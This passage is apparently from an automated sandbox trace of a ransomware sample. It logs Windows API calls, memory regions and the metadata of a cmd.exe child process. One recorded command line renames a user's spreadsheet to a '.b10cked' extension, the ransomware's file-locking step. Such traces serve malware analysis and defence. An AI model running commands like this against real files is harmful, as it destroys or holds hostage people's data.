lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.884] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.886] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.887] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x32, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x32, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.888] _close (_FileHandle=4) returned 0 [0140.888] FindNextFileW (in: hFindFile=0x3f0e70, lpFindFileData=0x28ee4c | out: lpFindFileData=0x28ee4c) returned 0 [0140.889] GetLastError () returned 0x12 [0140.889] FindClose (in: hFindFile=0x3f0e70 | out: hFindFile=0x3f0e70) returned 1 [0140.889] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.890] _close (_FileHandle=3) returned 0 [0140.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.890] SetConsoleInputExeNameW () returned 0x1 [0140.890] GetConsoleOutputCP () returned 0x1b5 [0140.891] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.891] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.891] exit (_Code=0) Process: id = "160" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14711 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14712 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14713 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14714 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14715 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14716 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14717 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14718 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14719 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14720 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15240 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15241 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15242 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15250 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15280 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 15281 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15282 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15283 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15284 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15285 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 15286 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15287 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15288 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 15289 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 217 os_tid = 0xd98 [0139.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f91c | out: lpSystemTimeAsFileTime=0x18f91c*(dwLowDateTime=0x8d0d5960, dwHighDateTime=0x1d440a9)) [0139.443] GetCurrentProcessId () returned 0xde4 [0139.443] GetCurrentThreadId () returned 0xd98 [0139.443] GetTickCount () returned 0x2bda3 [0139.443] QueryPerformanceCounter (in: lpPerformanceCount=0x18f914 | out: lpPerformanceCount=0x18f914*=19623249505) returned 1 [0139.444] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.444] __set_app_type (_Type=0x1) [0139.444] __p__fmode () returned 0x76b331f4 [0139.444] __p__commode () returned 0x76b331fc [0139.444] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.444] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.444] GetCurrentThreadId () returned 0xd98 [0139.444] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 [0139.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.444] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.444] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8ac | out: phkResult=0x18f8ac*=0x0) returned 0x2 [0139.462] VirtualQuery (in: lpAddress=0x18f8e3, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.462] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: 